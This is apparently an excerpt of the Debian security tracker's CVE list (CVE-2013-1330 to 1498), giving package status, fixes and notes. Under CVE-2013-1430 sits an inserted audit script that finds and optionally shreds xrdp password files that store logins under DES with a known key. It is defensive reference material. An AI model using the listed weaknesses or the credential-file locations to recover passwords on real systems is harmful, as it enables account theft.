CVE-2013-1498 (Unspecified vulnerability in Oracle Sun Solaris 10 and 11 allows local ...)
	NOT-FOR-US: Solaris
CVE-2013-1497 (Unspecified vulnerability in the Oracle COREid Access component in Ora ...)
	NOT-FOR-US: Oracle Fusion
CVE-2013-1496 (Unspecified vulnerability in Oracle Sun Solaris 10 and 11 allows local ...)
	NOT-FOR-US: Solaris
CVE-2013-1495 (asr in Oracle Auto Service Request in Oracle Support Tools before 4.3. ...)
	NOT-FOR-US: Oracle Auto Service Request
CVE-2013-1494 (Unspecified vulnerability in Oracle Sun Solaris 10, when running on SP ...)
	NOT-FOR-US: Solaris
CVE-2013-1493 (The color management (CMM) functionality in the 2D component in Oracle ...)
	- openjdk-6 6b27-1.12.4-1
	- openjdk-7 7u3-2.1.7-1
CVE-2013-1492 (Buffer overflow in yaSSL, as used in MySQL 5.1.x before 5.1.68 and 5.5 ...)
	{DSA-2780-1}
	- mysql-5.1 (bug #712059)
	- mysql-5.5 5.5.30+dfsg-1
	- cyassl (Fixed before initial upload to archive)
	NOTE: https://blogs.oracle.com/sunsecurity/entry/cve_2013_1492_buffer_overflow
CVE-2013-1491 (The Java Runtime Environment (JRE) component in Oracle Java SE 7 Updat ...)
	- openjdk-6 (Specific to Oracle Java, not present in IcedTea)
	- openjdk-7 (Specific to Oracle Java, not present in IcedTea)
	NOTE: Due to Oracle's vague disclosure policy the exact nature is unknown, but since
	NOTE: no patch landed in IcedTea we consider it not affected
CVE-2013-1490 (Unspecified vulnerability in Oracle Java SE 7 Update 11 (JRE 1.7.0_11- ...)
	- openjdk-6 (Not exploitable in OpenJDK6)
	- openjdk-7 (IcedTea 2.3 not affected)
CVE-2013-1489 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 (Only affects Java7)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-1488 (The Java Runtime Environment (JRE) component in Oracle Java SE 7 Updat ...)
	- openjdk-7 7u21-2.3.9-1
	- openjdk-6 (Only affects Java7)
CVE-2013-1487 (Unspecified vulnerability in the Java Runtime Environment component in ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-1486 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-7 7u3-2.1.6-1
	- openjdk-6 6b27-1.12.3-1
CVE-2013-1485 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-7 7u3-2.1.6-1
	- openjdk-6 (Only affects Java7)
CVE-2013-1484 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-7 7u3-2.1.6-1
	- openjdk-6 (Only affects Java7)
CVE-2013-1483 (Unspecified vulnerability in the JavaFX component in Oracle Java SE Ja ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2013-1482 (Unspecified vulnerability in the JavaFX component in Oracle Java SE Ja ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2013-1481 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 (IcedTea uses a different sound implementation than Oracle Java)
	- openjdk-7 (IcedTea uses a different sound implementation than Oracle Java)
CVE-2013-1480 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 6b27-1.12-1
	- openjdk-7 7u3-2.1.6-1
CVE-2013-1479 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2013-1478 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 6b27-1.12-1
	- openjdk-7 7u3-2.1.6-1
CVE-2013-1477 (Unspecified vulnerability in the JavaFX component in Oracle Java SE Ja ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2013-1476 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 6b27-1.12-1
	- openjdk-7 7u3-2.1.6-1
CVE-2013-1475 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 6b27-1.12-1
	- openjdk-7 7u3-2.1.6-1
CVE-2013-1474 (Unspecified vulnerability in the JavaFX component in Oracle Java SE Ja ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2013-1473 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-1472 (Unspecified vulnerability in the JavaFX component in Oracle Java SE Ja ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2013-1471 (Multiple cross-site scripting (XSS) vulnerabilities in admin/FEAdmin.h ...)
	NOT-FOR-US: Fortinet FortiMail
CVE-2013-1581 (The dissect_pft_fec_detailed function in epan/dissectors/packet-dcp-et ...)
	{DLA-497-1}
	- wireshark 1.8.6-1 (unimportant)
	NOTE: Not suitable for code injection
CVE-2013-1580 (The dissect_cmstatus_tlv function in plugins/docsis/packet-cmstatus.c ...)
	{DLA-497-1}
	- wireshark 1.8.6-1 (unimportant)
	NOTE: Not suitable for code injection
CVE-2013-1579 (The rtps_util_add_bitmap function in epan/dissectors/packet-rtps.c in ...)
	{DLA-497-1}
	- wireshark 1.8.6-1 (unimportant)
	NOTE: Not suitable for code injection
CVE-2013-1578 (The dissect_pw_eth_heuristic function in epan/dissectors/packet-pw-eth ...)
	{DLA-497-1}
	- wireshark 1.8.6-1 (unimportant)
	NOTE: Not suitable for code injection
CVE-2013-1577 (The dissect_sip_p_charging_func_addresses function in epan/dissectors/ ...)
	{DLA-497-1}
	- wireshark 1.8.6-1 (unimportant)
	NOTE: Not suitable for code injection
CVE-2013-1576 (The dissect_sdp_media_attribute function in epan/dissectors/packet-sdp ...)
	{DLA-497-1}
	- wireshark 1.8.6-1 (unimportant)
	NOTE: Not suitable for code injection
CVE-2013-1575 (The dissect_r3_cmd_alarmconfigure function in epan/dissectors/packet-a ...)
	{DLA-497-1}
	- wireshark 1.8.6-1 (unimportant)
	NOTE: Not suitable for code injection
CVE-2013-1574 (The dissect_bthci_eir_ad_data function in epan/dissectors/packet-bthci ...)
	{DLA-497-1}
	- wireshark 1.8.6-1 (unimportant)
	NOTE: Not suitable for code injection
CVE-2013-1573 (The csnStreamDissector function in epan/dissectors/packet-csn1.c in th ...)
	{DLA-497-1}
	- wireshark 1.8.6-1 (unimportant)
	NOTE: Not suitable for code injection
CVE-2013-1572 (The dissect_oampdu_event_notification function in epan/dissectors/pack ...)
	{DLA-497-1}
	- wireshark 1.8.6-1 (unimportant)
	NOTE: Not suitable for code injection
CVE-2013-1470 (Cross-site scripting (XSS) vulnerability in calendar/index.php in the ...)
	NOTE: There was an RFP a long time ago, bug #203818
	NOTE: https://www.htbridge.com/advisory/HTB23143
	NOT-FOR-US: Geeklog
CVE-2013-1469 (Directory traversal vulnerability in install.php in Piwigo before 2.4. ...)
	- piwigo
	[squeeze] - piwigo (Unsupported in squeeze-lts)
	NOTE: Request to mark the package as unsupported in #779104
	NOTE: https://www.htbridge.com/advisory/HTB23144
CVE-2013-1468 (Cross-site request forgery (CSRF) vulnerability in the LocalFiles Edit ...)
	- piwigo
	[squeeze] - piwigo (Unsupported in squeeze-lts)
	NOTE: Request to mark the package as unsupported in #779104
	NOTE: https://www.htbridge.com/advisory/HTB23144
CVE-2013-1467
	RESERVED
CVE-2013-1466 (Multiple cross-site scripting (XSS) vulnerabilities in glFusion before ...)
	NOT-FOR-US: glFusion
CVE-2013-1465 (The Cubecart::_basket method in classes/cubecart.class.php in CubeCart ...)
	NOT-FOR-US: CubeCart
CVE-2013-1464 (Cross-site scripting (XSS) vulnerability in assets/player.swf in the A ...)
	{DSA-2772-1}
	- typo3-src 4.5.29+dfsg1-1
	[squeeze] - typo3-src (Unsupported in squeeze-lts)
CVE-2013-1463 (Cross-site scripting (XSS) vulnerability in js/tabletools/zeroclipboar ...)
	NOT-FOR-US: WordPress plugin
CVE-2013-1462 (Integer signedness error in the ExecuteSoapAction function in the SOAP ...)
	- miniupnpd (Fixed before initial upload to archive)
CVE-2013-1461 (The ExecuteSoapAction function in the SOAPAction handler in the HTTP s ...)
	- miniupnpd (Fixed before initial upload to archive)
CVE-2013-1460
	RESERVED
CVE-2013-1459
	RESERVED
CVE-2013-1458
	RESERVED
CVE-2013-1457
	RESERVED
CVE-2013-1456
	RESERVED
CVE-2013-1455 (Joomla! 3.0.x through 3.0.2 allows attackers to obtain sensitive infor ...)
	NOT-FOR-US: Joomla!
CVE-2013-1454 (Joomla! 3.0.x through 3.0.2 allows attackers to obtain sensitive infor ...)
	NOT-FOR-US: Joomla!
CVE-2013-1453 (plugins/system/highlight/highlight.php in Joomla! 3.0.x through 3.0.2 ...)
	NOT-FOR-US: Joomla!
CVE-2013-1452
	RESERVED
CVE-2013-4696
	REJECTED
CVE-2013-1451 (Microsoft Internet Explorer 8 and 9, when the Proxy Settings configura ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-1450 (Microsoft Internet Explorer 8 and 9, when the Proxy Settings configura ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-1449
	RESERVED
CVE-2013-1448
	RESERVED
CVE-2013-1447 (OpenJPEG 1.3 and earlier allows remote attackers to cause a denial of ...)
	{DSA-2808-1}
	- openjpeg 1.3+dfsg-4.7 (bug #731237)
CVE-2013-1446
	RESERVED
CVE-2013-1445 (The Crypto.Random.atfork function in PyCrypto before 2.6.1 does not pr ...)
	{DSA-2781-1}
	- python-crypto 2.6.1-1
CVE-2013-1444 (A certain Debian patch for txt2man 1.5.5, as used in txt2man 1.5.5-2, ...)
	- txt2man 1.5.5-4.1 (bug #724614)
	[wheezy] - txt2man (Minor issue)
	[squeeze] - txt2man (Minor issue)
CVE-2013-1443 (The authentication framework (django.contrib.auth) in Django 1.4.x bef ...)
	{DSA-2758-1}
	- python-django 1.5.4-1 (bug #723043)
CVE-2013-1442 (Xen 4.0 through 4.3.x, when using AVX or LWP capable CPUs, does not pr ...)
	{DSA-3006-1}
	- xen 4.4.0-1
	[squeeze] - xen (Unsupported in squeeze-lts)
	NOTE: advisory says: In Xen 4.0.2 through 4.0.4 as well as in Xen 4.1.x XSAVE support is disabled by default
CVE-2013-1441 (econvert in ExactImage 0.8.9 and earlier does not properly initialize ...)
	{DSA-2754-1}
	- exactimage 0.8.9-2
	NOTE: a different issue than CVE-2013-1438
CVE-2013-1440
	RESERVED
CVE-2013-1439 (The "faster LJPEG decoder" in libraw 0.13.x, 0.14.x, and 0.15.x before ...)
	- libraw 0.15.4-1 (bug #721338)
	[wheezy] - libraw (Minor issue)
	[squeeze] - libraw (Minor issue)
	- libkdcraw 4:4.10.5-2 (bug #721340)
	[wheezy] - libkdcraw (Minor issue)
	- darktable 1.2.2-2 (bug #721339)
	[wheezy] - darktable 1.0.4-1+deb7u2
CVE-2013-1438 (Unspecified vulnerability in dcraw 0.8.x through 0.8.9, as used in lib ...)
	{DSA-2748-1}
	- libraw 0.15.4-1 (bug #721231)
	[wheezy] - libraw (Minor issue)
	[squeeze] - libraw (Minor issue)
	- libkdcraw 4:4.10.5-2 (bug #721239)
	[wheezy] - libkdcraw (Minor issue)
	- darktable 1.2.2-2 (bug #721233)
	[wheezy] - darktable 1.0.4-1+deb7u2
	- dcraw 9.28-1 (unimportant; bug #721232)
	- ufraw 0.19.2-2 (bug #721234)
	[wheezy] - ufraw (end-user app)
	[squeeze] - ufraw (end-user app)
	- xbmc 2:13.2+dfsg1-5 (unimportant; bug #721235)
	- exactimage 0.8.9-1 (bug #721236)
	- rawstudio (unimportant; bug #721237)
	- rawtherapee (unimportant; bug #721238)
	NOTE: Starting with 2:13.2+dfsg1-5 xbmc is a transitional package
CVE-2013-1437 (Eval injection vulnerability in the Module-Metadata module before 1.00 ...)
	- perl 5.18.1-2
	[wheezy] - perl (Bug was introduced later)
	[squeeze] - perl (Does not yet contain Module::Metadata)
	- libmodule-metadata-perl 1.000015-1
	[wheezy] - libmodule-metadata-perl 1.000009-1+deb7u1
	NOTE: this is by 'design', but prior to version Module::Metadata 1.000015
	NOTE: the statement was: This module provides a standard way to gather metadata
	NOTE: about a .pm file *without* executing unsafe code.
CVE-2013-1436 (The XMonad.Hooks.DynamicLog module in xmonad-contrib before 0.11.2 all ...)
	- xmonad-contrib 0.11.2-1 (low)
	[squeeze] - xmonad-contrib (Minor issue)
	[wheezy] - xmonad-contrib 0.10-4~deb7u1
CVE-2013-1435 ((1) snmp.php and (2) rrd.php in Cacti before 0.8.8b allows remote atta ...)
	{DSA-2739-1}
	- cacti 0.8.8b+dfsg-1
	NOTE: http://svn.cacti.net/viewvc?view=rev&revision=7392
	NOTE: http://svn.cacti.net/viewvc?view=rev&revision=7393
CVE-2013-1434 (Multiple SQL injection vulnerabilities in (1) api_poller.php and (2) u ...)
	{DSA-2739-1}
	- cacti 0.8.8b+dfsg-1
	NOTE: http://svn.cacti.net/viewvc?view=rev&revision=7394
CVE-2013-1433
	REJECTED
CVE-2013-1432 (Xen 4.1.x and 4.2.x, when the XSA-45 patch is in place, does not prope ...)
	{DSA-3006-1}
	- xen 4.3.0-1
	[squeeze] - xen (Unsupported in squeeze-lts)
	NOTE: All Xen versions having the XSA-45/CVE-2013-1918 fixes applied are vulnerable
CVE-2013-1431 (The Wocky module in Telepathy Gabble before 0.16.6 and 0.17.x before 0 ...)
	{DSA-2702-1}
	- telepathy-gabble 0.16.6-1
CVE-2013-1430 (An issue was discovered in xrdp before 0.9.1. When successfully loggin ...)
	- xrdp 0.9.1~2016121126+git5171fa7-1
	[jessie] - xrdp (Minor issue)
	[wheezy] - xrdp (Minor issue)
	NOTE: https://github.com/neutrinolabs/xrdp/pull/497
	NOTE: When successfully logging in using RDP into an xrdp session, the file
	NOTE: ~/.vnc/sesman_${username}_passwd is created. Its content is the
	NOTE: equivalent of the user's clear-text password, DES encrypted with a known
	NOTE: key.
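Added audit check for the CVE-2013-1430 note above; this is example code written for this entry, not part of xrdp or of the tracker. It walks the home directories under a base path (assumed /home by default; the per-user layout <base>/<user>/.vnc/ is the one the note describes) and reports every sesman_<username>_passwd file it finds. Because the file content is the user's login password under DES with a fixed key, every copy still on disk is a recoverable credential even after xrdp has been upgraded, so the script can also remove them when REMOVE=1 is set.

```shell
#!/bin/sh
# Audit helper for CVE-2013-1430 (example, not xrdp's or the tracker's code).
# Vulnerable xrdp (< 0.9.1) writes ~/.vnc/sesman_<username>_passwd at every
# RDP login; the file holds the login password under DES with a known key,
# so it must be treated as a plaintext credential on disk.
# Assumptions: home directories sit directly below the base directory given
# as $1 (default /home); find(1) supports -maxdepth (GNU and BSD do).

# Print every matching file, one per line.
find_sesman_passwd_files() {
    base="${1:-/home}"
    # depth 3 = <base>/<user>/.vnc/sesman_<user>_passwd
    find "$base" -maxdepth 3 -type f -path '*/.vnc/sesman_*_passwd' 2>/dev/null
}

# Print the number of matching files (0 when there are none).
count_sesman_passwd_files() {
    find_sesman_passwd_files "$1" | wc -l | tr -d ' '
}

# Report each file; with REMOVE=1 also overwrite and unlink it. Removal is
# safe: a fixed xrdp no longer needs the file, and an unfixed one simply
# recreates it at the next login (which is what the upgrade must stop).
report_sesman_passwd_files() {
    base="${1:-/home}"
    find_sesman_passwd_files "$base" | while IFS= read -r f; do
        mode=$(ls -l "$f" | cut -c1-10)
        echo "WARN: $f ($mode) stores a reversible DES-encrypted login password"
        if [ "${REMOVE:-0}" = "1" ]; then
            # shred is GNU coreutils; fall back to a plain unlink elsewhere
            shred -u "$f" 2>/dev/null || rm -f "$f"
            echo "      removed $f"
        fi
    done
    echo "$(count_sesman_passwd_files "$base") file(s) remaining under $base"
}

# Stand-alone use: ./check-sesman-passwd.sh [/home]   (REMOVE=1 to clean up)
if [ "${0##*/}" = "check-sesman-passwd.sh" ]; then
    report_sesman_passwd_files "$1"
fi
```

Run it as root so every home directory is readable, and check /root and any non-standard home base (e.g. /export/home) separately by passing the path as the first argument. A file that reappears after removal means the host is still running a vulnerable xrdp.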
CVE-2013-1429 (Lintian before 2.5.12 allows remote attackers to gather information ab ...)
	- lintian 2.5.10.5 (bug #705553; unimportant)
CVE-2013-1428 (Stack-based buffer overflow in the receive_tcppacket function in net_p ...)
	{DSA-2663-1}
	- tinc 1.0.19-3
CVE-2013-1427 (The configuration file for the FastCGI PHP support for lighttpd before ...)
	{DSA-2649-1}
	- lighttpd 1.4.31-4
CVE-2013-1426 (Cross-site Scripting (XSS) in Mahara before 1.5.9 and 1.6.x before 1.6 ...)
	- mahara (low)
	[wheezy] - mahara (Minor issue)
	[squeeze] - mahara (Minor issue)
	NOTE: https://bugs.launchpad.net/mahara/+bug/1153423
CVE-2013-1425 (ldap-git-backup before 1.0.4 exposes password hashes due to incorrect ...)
	- ldap-git-backup 1.0.4-1 (bug #699227)
CVE-2013-1424 [matplotlib buffer overrun]
	RESERVED
	- matplotlib 1.4.2-3.1 (low; bug #775691)
	[wheezy] - matplotlib (Minor issue)
	[squeeze] - matplotlib (Minor issue)
CVE-2013-1423 ((1) contrib/gforge-3.0-cronjobs.patch, (2) cronjobs/homedirs.php, (3) ...)
	{DSA-2633-1}
	- fusionforge 5.2.1+20130227-1
CVE-2013-1422 (webcalendar before 1.2.7 shows the reason for a failed login (e.g., "n ...)
	- webcalendar
CVE-2013-1421 (Cross-site scripting (XSS) vulnerability in Craig Knudsen WebCalendar ...)
	- webcalendar
CVE-2013-1420 (Multiple cross-site scripting (XSS) vulnerabilities in GetSimple CMS b ...)
	NOT-FOR-US: GetSimple CMS
CVE-2013-1419
	RESERVED
CVE-2013-1418 (The setup_server_realm function in main.c in the Key Distribution Cent ...)
	{DLA-1265-1}
	- krb5 1.11.3+dfsg-3+nmu1 (low; bug #728845)
	[squeeze] - krb5 (Minor issue)
	NOTE: http://krbdev.mit.edu/rt/Ticket/Display.html?id=7757
	NOTE: https://github.com/krb5/krb5/commit/5d2d9a1abe46a2c1a8614d4672d08d9d30a5f8bf
CVE-2013-1417 (do_tgs_req.c in the Key Distribution Center (KDC) in MIT Kerberos 5 (a ...)
	- krb5 1.11.3+dfsg-3+nmu1 (low; bug #730085)
	[squeeze] - krb5 (Vulnerable code only present in 1.11.x)
	[wheezy] - krb5 (Vulnerable code only present in 1.11.x)
	NOTE: https://github.com/krb5/krb5/commit/4c023ba43c16396f0d199e2df1cfa59b88b62acc
CVE-2013-1416 (The prep_reprocess_req function in do_tgs_req.c in the Key Distributio ...)
	- krb5 1.10.1+dfsg-5 (low; bug #704775)
	[squeeze] - krb5 (Minor issue)
CVE-2013-1415 (The pkinit_check_kdc_pkid function in plugins/preauth/pkinit/pkinit_cr ...)
	- krb5 1.10.1+dfsg-4 (low)
	[squeeze] - krb5 (Minor issue)
	NOTE: https://github.com/krb5/krb5/commit/c773d3c775e9b2d88bcdff5f8a8ba88d7ec4e8ed
	NOTE: https://github.com/krb5/krb5/commit/b71f8c4aacea8849ceaf31a2fa95e143f3943097
CVE-2013-1414 (Multiple cross-site request forgery (CSRF) vulnerabilities in Fortinet ...)
	NOT-FOR-US: Fortinet FortiOS on FortiGate firewall devices
CVE-2013-1413 (Multiple cross-site scripting (XSS) vulnerabilities in synetics i-doit ...)
	NOT-FOR-US: synetics i-doit
CVE-2013-1412 (DataLife Engine (DLE) 9.7 allows remote attackers to execute arbitrary ...)
	NOT-FOR-US: DataLife Engine
CVE-2013-1411
	RESERVED
CVE-2013-1410 (Perforce P4web 2011.1 and 2012.1 has multiple XSS vulnerabilities ...)
	NOT-FOR-US: Perforce
CVE-2013-1409 (Cross-site scripting (XSS) vulnerability in the CommentLuv plugin befo ...)
	NOT-FOR-US: CommentLuv plugin for WordPress
CVE-2013-1408 (Multiple SQL injection vulnerabilities in the Wysija Newsletters plugi ...)
	NOT-FOR-US: WordPress plugin wysija-newsletters
CVE-2013-1407 (Multiple cross-site scripting (XSS) vulnerabilities in the Events Mana ...)
	NOT-FOR-US: WordPress plugin Events Master Pro
CVE-2013-1406 (The Virtual Machine Communication Interface (VMCI) implementation in v ...)
	NOT-FOR-US: VMware Workstation, Fusion, View, ESXi, ESX
CVE-2013-1405 (VMware vCenter Server 4.0 before Update 4b and 4.1 before Update 3a, V ...)
	NOT-FOR-US: VMware
CVE-2013-1404
	RESERVED
CVE-2013-1403
	RESERVED
CVE-2013-1402 (DigiLIBE 3.4 and possibly other versions sends a redirect but does not ...)
	NOT-FOR-US: DigiLIBE
CVE-2013-1401 (Multiple security bypass vulnerabilities in the editAnswer, deleteAnsw ...)
	NOT-FOR-US: WordPress Poll Plugin for WordPress
CVE-2013-1400 (Multiple SQL injection vulnerabilities in CWPPoll.js in WordPress Poll ...)
	NOT-FOR-US: WordPress Poll Plugin for WordPress
CVE-2013-0243 (haskell-tls-extra before 0.6.1 has Basic Constraints attribute vulnera ...)
	- haskell-tls-extra 0.4.6.1-1 (bug #698545)
CVE-2013-1399 (Multiple cross-site request forgery (CSRF) vulnerabilities in the (1) ...)
	- puppet (Only affects Puppet Enterprise)
CVE-2013-1398 (The pe_mcollective module in Puppet Enterprise (PE) before 2.7.1 does ...)
	- puppet (Only affects Puppet Enterprise)
CVE-2013-1397 (Symfony 2.0.x before 2.0.22, 2.1.x before 2.1.7, and 2.2.x remote atta ...)
	- php-symfony2-yaml (Only affects versions 2.0, 2.1, 2.2)
CVE-2013-1396
	RESERVED
CVE-2013-1395
	RESERVED
CVE-2013-1394
	RESERVED
CVE-2013-1393 (Cross-site scripting (XSS) vulnerability in the CurvyCorners module 6. ...)
	NOT-FOR-US: Drupal module CurvyCorners
CVE-2013-1392
	RESERVED
CVE-2013-1391 (Authentication bypass vulnerability in the web interface in Hunt C ...)
	NOT-FOR-US: DVR systems
CVE-2013-1390
	RESERVED
CVE-2013-1389 (Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 11, 9. ...)
	NOT-FOR-US: Adobe ColdFusion 9.0
CVE-2013-1388 (Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 10, 9. ...)
	NOT-FOR-US: Adobe ColdFusion
CVE-2013-1387 (Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 10, 9. ...)
	NOT-FOR-US: Adobe ColdFusion
CVE-2013-1386 (Adobe Shockwave Player before 12.0.2.122 allows attackers to execute a ...)
	NOT-FOR-US: Adobe Shockwave Player
CVE-2013-1385 (Adobe Shockwave Player before 12.0.2.122 does not prevent access to ad ...)
	NOT-FOR-US: Adobe Shockwave Player
CVE-2013-1384 (Adobe Shockwave Player before 12.0.2.122 allows attackers to execute a ...)
	NOT-FOR-US: Adobe Shockwave Player
CVE-2013-1383 (Buffer overflow in Adobe Shockwave Player before 12.0.2.122 allows att ...)
	NOT-FOR-US: Adobe Shockwave Player
CVE-2013-1382
	REJECTED
CVE-2013-1381
	REJECTED
CVE-2013-1380 (Adobe Flash Player before 10.3.183.75 and 11.x before 11.7.700.169 on ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-1379 (Adobe Flash Player before 10.3.183.75 and 11.x before 11.7.700.169 on ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-1378 (Adobe Flash Player before 10.3.183.75 and 11.x before 11.7.700.169 on ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-1377 (Adobe Digital Editions 2.x before 2.0.1 allows attackers to execute ar ...)
	NOT-FOR-US: Adobe Digital Editions
CVE-2013-1376 (Buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.3, 10.x bef ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-1375 (Heap-based buffer overflow in Adobe Flash Player before 10.3.183.68 an ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-1374 (Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-1373 (Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x befo ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-1372 (Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x befo ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-1371 (Adobe Flash Player before 10.3.183.68 and 11.x before 11.6.602.180 on ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-1370 (Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x befo ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-1369 (Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x befo ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-1368 (Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x befo ...)
NOT-FOR-US: Adobe Flash Plugin
CVE-2013-1367 (Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x befo ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-1366 (Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x befo ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-1365 (Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x befo ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-1364 (The user.login function in Zabbix before 1.8.16 and 2.x before 2.0.5rc ...)
	- zabbix 1:2.0.4+dfsg-2 (bug #698541)
	[squeeze] - zabbix (Not supported in Squeeze LTS)
	NOTE: patches in https://support.zabbix.com/browse/ZBX-6097
CVE-2013-1363 RESERVED
CVE-2013-1362 (Incomplete blacklist vulnerability in nrpc.c in Nagios Remote Plug-In ...)
	- nagios-nrpe 2.13-3 (low; bug #701227)
	[squeeze] - nagios-nrpe (Minor issue)
CVE-2013-1361 (Untrusted search path vulnerability in Lenovo Thinkpad Bluetooth with ...)
	NOT-FOR-US: Lenovo Thinkpad Bluetooth with Enhanced Data Rate Software
CVE-2013-1360 (An Authentication Bypass vulnerability exists in DELL SonicWALL Global ...)
	NOT-FOR-US: DELL SonicWALL Global Management System (GMS)
CVE-2013-1359 (An Authentication Bypass Vulnerability exists in DELL SonicWALL Analyz ...)
	NOT-FOR-US: DELL SonicWALL
CVE-2013-1358 RESERVED
CVE-2013-1357 RESERVED
CVE-2013-1356 RESERVED
CVE-2013-1355 REJECTED
CVE-2013-1354 RESERVED
CVE-2013-1353 (Orange HRM 2.7.1 allows XSS via the vacancy name. ...)
	NOT-FOR-US: Orange HRM
CVE-2013-1352 (Verax NMS prior to 2.1.0 uses an encryption key that is hardcoded in a ...)
	NOT-FOR-US: Verax NMS
CVE-2013-1351 (Verax NMS prior to 2.10 allows authentication via the encrypted passwo ...)
	NOT-FOR-US: Verax NMS
CVE-2013-1350 (Verax NMS prior to 2.1.0 has multiple security bypass vulnerabilities ...)
	NOT-FOR-US: Verax NMS
CVE-2013-1349 (Eval injection vulnerability in ajax.php in openSIS 4.5 through 5.2 al ...)
NOT-FOR-US: openSIS
CVE-2013-1348 (The Yaml::parse function in Symfony 2.0.x before 2.0.22 remote attacke ...)
	- php-symfony2-yaml (Only affects version 2.0)
CVE-2013-1347 (Microsoft Internet Explorer 8 does not properly handle objects in memo ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-1346 (mpengine.dll in Microsoft Malware Protection Engine before 1.1.9506.0 ...)
	NOT-FOR-US: Microsoft Malware Protection Engine
CVE-2013-1345 (win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and ...)
	NOT-FOR-US: Microsoft
CVE-2013-1344 (win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1343 (win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1342 (win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1341 (win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and ...)
	NOT-FOR-US: Microsoft
CVE-2013-1340 (win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and ...)
	NOT-FOR-US: Microsoft
CVE-2013-1339 (The Print Spooler in Microsoft Windows Vista SP2, Windows Server 2008 ...)
	NOT-FOR-US: Microsoft
CVE-2013-1338 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-1337 (Microsoft .NET Framework 4.5 does not properly create policy requireme ...)
	NOT-FOR-US: Microsoft .NET Framework 4.5
CVE-2013-1336 (The Common Language Runtime (CLR) in Microsoft .NET Framework 2.0 SP2, ...)
	NOT-FOR-US: Microsoft .NET Framework
CVE-2013-1335 (Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to exec ...)
	NOT-FOR-US: Microsoft Word
CVE-2013-1334 (win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1333 (Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft ...)
NOT-FOR-US: Microsoft Windows
CVE-2013-1332 (dxgkrnl.sys (aka the DirectX graphics kernel subsystem) in the kernel- ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1331 (Buffer overflow in Microsoft Office 2003 SP3 and Office 2011 for Mac a ...)
	NOT-FOR-US: Microsoft
CVE-2013-1330 (The default configuration of Microsoft SharePoint Portal Server 2003 S ...)
